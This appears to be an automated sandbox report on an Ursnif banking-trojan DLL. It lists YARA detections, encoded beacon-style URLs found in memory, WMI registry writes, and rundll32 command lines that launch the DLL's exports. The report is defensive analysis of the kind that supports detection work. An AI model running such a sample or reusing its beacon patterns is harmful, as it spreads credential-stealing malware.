                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | String found in binary or memory: https://wwtlook.office365.com/
                      Source: loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2f31Pla_2BCXtei%2f1R_2BY6O%2fxV8Y0PePoExsKvdRsArLjMT%2
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2f5hHdOh6aVGIiN%2fxm3v7_2B%2fEkShunhzAo7MsZ9CmkqFWtX%2
                      Source: rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fNtZggqxIX2EF9w_2%2fBavTQ0jHk8z72E0%2fmrA_2BNo5fGf18q
                      Source: rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fQoeEw7znNY9KuZLPv%2fPhlDvAFg0Bnn%2fnVx6DnTynJS%2fJqe
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmp | String found in binary or memory: https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXa
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1184778471.0000000001722000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmp | String found in binary or memory: https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V
                      Source: unknown | DNS traffic detected: queries for: msn.com
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49779 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.116.82:443 -> 192.168.2.4:49806 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.183.162:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.218.82:443 -> 192.168.2.4:49808 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.218.66:443 -> 192.168.2.4:49810 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.137.210:443 -> 192.168.2.4:49811 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49827 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49829 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49860 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.98.207.194:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.101.124.226:443 -> 192.168.2.4:49862 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara match | File source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara match | File source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Ursnif

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 616412739e268.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2D21B4
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2E5600
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E31D630
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E333CCE
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E31B597
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E32A2B1
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E30E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CD4C40
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CD2B76
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CDAF24
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E2E5600
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E31D630
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E333CCE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E31B597
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E33FA78
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E32A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E33FB98
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E30E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04974C40
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0497AF24
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04972B76
                      Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6E30ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E30ABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2D13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2D1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2D15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2D23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CD5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CDB149 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04975D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0497B149 NtQueryVirtualMemory,
                      Source: 616412739e268.dll | ReversingLabs: Detection: 24%
                      Source: 616412739e268.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EDD.tmp
                      Source: classification engine | Classification label: mal96.troj.evad.winDLL@14/12@24/10
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CD4A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6464
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7072
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: 616412739e268.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 616412739e268.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.880000220.0000000004643000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbJv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbvv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb: source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbnv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbE source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbO{ source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbQt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdbr source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbLy source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbby source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbXv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbx source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbQ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbet source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbst source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
